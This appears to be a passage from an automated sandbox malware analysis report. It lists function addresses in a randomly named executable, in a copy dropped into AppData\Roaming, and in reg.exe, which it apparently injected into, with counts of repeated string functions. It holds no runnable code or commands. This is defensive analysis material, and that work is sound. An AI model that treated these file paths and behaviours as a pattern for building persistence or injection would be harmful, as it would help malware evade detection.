            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00416C23 8_2_00416C23
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D5D 8_2_00402D5D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D60 8_2_00402D60
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00410503 8_2_00410503
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_004025C9 8_2_004025C9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402580 8_2_00402580
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0040E583 8_2_0040E583
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_00402D89 8_2_00402D89
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018641A2 8_2_018641A2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018701AA 8_2_018701AA
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018681CC 8_2_018681CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0100 8_2_017A0100
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184A118 8_2_0184A118
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01838158 8_2_01838158
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01842000 8_2_01842000
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018703E6 8_2_018703E6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE3F0 8_2_017BE3F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186A352 8_2_0186A352
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018302C0 8_2_018302C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01870591 8_2_01870591
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185E4F6 8_2_0185E4F6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01854420 8_2_01854420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01862446 8_2_01862446
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D4750 8_2_017D4750
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AC7C0 8_2_017AC7C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CC6E0 8_2_017CC6E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C6962 8_2_017C6962
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187A9A6 8_2_0187A9A6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B29A0 8_2_017B29A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BA840 8_2_017BA840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B2840 8_2_017B2840
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE8F0 8_2_017DE8F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017968B8 8_2_017968B8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01866BD7 8_2_01866BD7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186AB40 8_2_0186AB40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AEA80 8_2_017AEA80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BAD00 8_2_017BAD00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AADE0 8_2_017AADE0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184CD1F 8_2_0184CD1F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C8DBF 8_2_017C8DBF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850CB5 8_2_01850CB5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0C00 8_2_017B0C00
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0CF2 8_2_017A0CF2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182EFA0 8_2_0182EFA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D0F30 8_2_017D0F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F2F28 8_2_017F2F28
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2FC8 8_2_017A2FC8
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01852F30 8_2_01852F30
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01824F40 8_2_01824F40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186CE938_2_0186CE93
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0E598_2_017B0E59
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186EEDB8_2_0186EEDB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186EE268_2_0186EE26
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C2E908_2_017C2E90
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179F1728_2_0179F172
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E516C8_2_017E516C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BB1B08_2_017BB1B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187B16B8_2_0187B16B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185F0CC8_2_0185F0CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F0E08_2_0186F0E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018670E98_2_018670E9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B70C08_2_017B70C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179D34C8_2_0179D34C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186132D8_2_0186132D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F739A8_2_017F739A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018512ED8_2_018512ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CD2F08_2_017CD2F0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CB2C08_2_017CB2C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B52A08_2_017B52A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184D5B08_2_0184D5B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018795C38_2_018795C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018675718_2_01867571
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A14608_2_017A1460
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F43F8_2_0186F43F
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186F7B08_2_0186F7B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018616CC8_2_018616CC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F56308_2_017F5630
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B99508_2_017B9950
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CB9508_2_017CB950
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018459108_2_01845910
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181D8008_2_0181D800
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B38E08_2_017B38E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01825BF08_2_01825BF0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017EDBF98_2_017EDBF9
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FB768_2_0186FB76
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CFB808_2_017CFB80
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01851AA38_2_01851AA3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184DAAC8_2_0184DAAC
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185DAC68_2_0185DAC6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01867A468_2_01867A46
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FA498_2_0186FA49
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017F5AA08_2_017F5AA0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01823A6C8_2_01823A6C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B3D408_2_017B3D40
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CFDC08_2_017CFDC0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01861D5A8_2_01861D5A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01867D738_2_01867D73
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FCF28_2_0186FCF2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01829C328_2_01829C32
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FFB18_2_0186FFB1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0186FF098_2_0186FF09
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01773FD58_2_01773FD5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01773FD28_2_01773FD2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B1F928_2_017B1F92
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B9EB08_2_017B9EB0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 9_2_00B0D5BC9_2_00B0D5BC
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112010015_2_01120100
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0111F17215_2_0111F172
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116516C15_2_0116516C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113B1B015_2_0113B1B0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0111D34C15_2_0111D34C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011333F315_2_011333F3
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011352A015_2_011352A0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114B2C015_2_0114B2C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011B02C015_2_011B02C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114D2F015_2_0114D2F0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113053515_2_01130535
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112146015_2_01121460
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113349715_2_01133497
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113B73015_2_0113B730
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0115475015_2_01154750
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113077015_2_01130770
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112C7C015_2_0112C7C0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114C6E015_2_0114C6E0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113995015_2_01139950
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114B95015_2_0114B950
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114696215_2_01146962
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113599015_2_01135990
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011329A015_2_011329A0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0119D80015_2_0119D800
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113A84015_2_0113A840
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113284015_2_01132840
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116889015_2_01168890
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011168B815_2_011168B8
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0115E8F015_2_0115E8F0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114FB8015_2_0114FB80
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A5BF015_2_011A5BF0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0116DBF915_2_0116DBF9
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A3A6C15_2_011A3A6C
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112EA8015_2_0112EA80
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113AD0015_2_0113AD00
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01133D4015_2_01133D40
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0113ED7A15_2_0113ED7A
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01148DBF15_2_01148DBF
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01138DC015_2_01138DC0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0114FDC015_2_0114FDC0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0112ADE015_2_0112ADE0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01130C0015_2_01130C00
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A9C3215_2_011A9C32
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01149C2015_2_01149C20
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01120CF215_2_01120CF2
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01150F3015_2_01150F30
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01172F2815_2_01172F28
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011A4F4015_2_011A4F40
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01131F9215_2_01131F92
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_011AEFA015_2_011AEFA0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01122FC815_2_01122FC8
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01130E5915_2_01130E59
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01142E9015_2_01142E90
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_01139EB015_2_01139EB0
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exeCode function: 15_2_0042DC2315_2_0042DC23
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361A35217_2_0361A352
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036203E617_2_036203E6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356E3F017_2_0356E3F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360027417_2_03600274
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035E02C017_2_035E02C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035E815817_2_035E8158
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FA11817_2_035FA118
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355010017_2_03550100
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036181CC17_2_036181CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036141A217_2_036141A2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036201AA17_2_036201AA
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035F200017_2_035F2000
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0358475017_2_03584750
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356077017_2_03560770
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355C7C017_2_0355C7C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357C6E017_2_0357C6E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356053517_2_03560535
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362059117_2_03620591
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361244617_2_03612446
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360442017_2_03604420
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360E4F617_2_0360E4F6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361AB4017_2_0361AB40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03616BD717_2_03616BD7
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355EA8017_2_0355EA80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357696217_2_03576962
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362A9A617_2_0362A9A6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035629A017_2_035629A0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356284017_2_03562840
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356A84017_2_0356A840
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0358E8F017_2_0358E8F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035468B817_2_035468B8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D4F4017_2_035D4F40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03602F3017_2_03602F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03580F3017_2_03580F30
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A2F2817_2_035A2F28
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03552FC817_2_03552FC8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035DEFA017_2_035DEFA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03560E5917_2_03560E59
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361EE2617_2_0361EE26
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361EEDB17_2_0361EEDB
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03572E9017_2_03572E90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361CE9317_2_0361CE93
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FCD1F17_2_035FCD1F
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356AD0017_2_0356AD00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355ADE017_2_0355ADE0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03578DBF17_2_03578DBF
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03560C0017_2_03560C00
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03550CF217_2_03550CF2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03600CB517_2_03600CB5
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0354D34C17_2_0354D34C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361132D17_2_0361132D
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A739A17_2_035A739A
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036012ED17_2_036012ED
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357B2C017_2_0357B2C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357D2F017_2_0357D2F0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035652A017_2_035652A0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0362B16B17_2_0362B16B
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0354F17217_2_0354F172
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0359516C17_2_0359516C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356B1B017_2_0356B1B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F0E017_2_0361F0E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036170E917_2_036170E9
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035670C017_2_035670C0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360F0CC17_2_0360F0CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F7B017_2_0361F7B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A563017_2_035A5630
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036116CC17_2_036116CC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361757117_2_03617571
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_036295C317_2_036295C3
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FD5B017_2_035FD5B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0355146017_2_03551460
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361F43F17_2_0361F43F
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FB7617_2_0361FB76
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0359DBF917_2_0359DBF9
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D5BF017_2_035D5BF0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357FB8017_2_0357FB80
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03617A4617_2_03617A46
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FA4917_2_0361FA49
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D3A6C17_2_035D3A6C
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0360DAC617_2_0360DAC6
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03601AA317_2_03601AA3
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035FDAAC17_2_035FDAAC
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035A5AA017_2_035A5AA0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0356995017_2_03569950
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357B95017_2_0357B950
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035F591017_2_035F5910
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035CD80017_2_035CD800
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035638E017_2_035638E0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FF0917_2_0361FF09
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03523FD217_2_03523FD2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03523FD517_2_03523FD5
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03561F9217_2_03561F92
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FFB117_2_0361FFB1
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03569EB017_2_03569EB0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03617D7317_2_03617D73
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03563D4017_2_03563D40
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_03611D5A17_2_03611D5A
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0357FDC017_2_0357FDC0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_035D9C3217_2_035D9C32
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0361FCF217_2_0361FCF2
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE1B6017_2_02CE1B60
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CFA6B017_2_02CFA6B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDCF9017_2_02CDCF90
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDCD7017_2_02CDCD70
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CDB01017_2_02CDB010
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE36AB17_2_02CE36AB
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_02CE36B017_2_02CE36B0
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342B0E817_2_0342B0E8
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342C08317_2_0342C083
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342BBC417_2_0342BBC4
            Source: C:\Windows\SysWOW64\reg.exeCode function: 17_2_0342BCE617_2_0342BCE6
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: String function: 0119EA12 appears 36 times
            Source: C:\Users\user\AppData\Roaming\AZJifQrhDpEQCA.exe | Code function: String function: 01177E54 appears 96 times
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exe | Code function: String function: 0179B970 appears 262 times
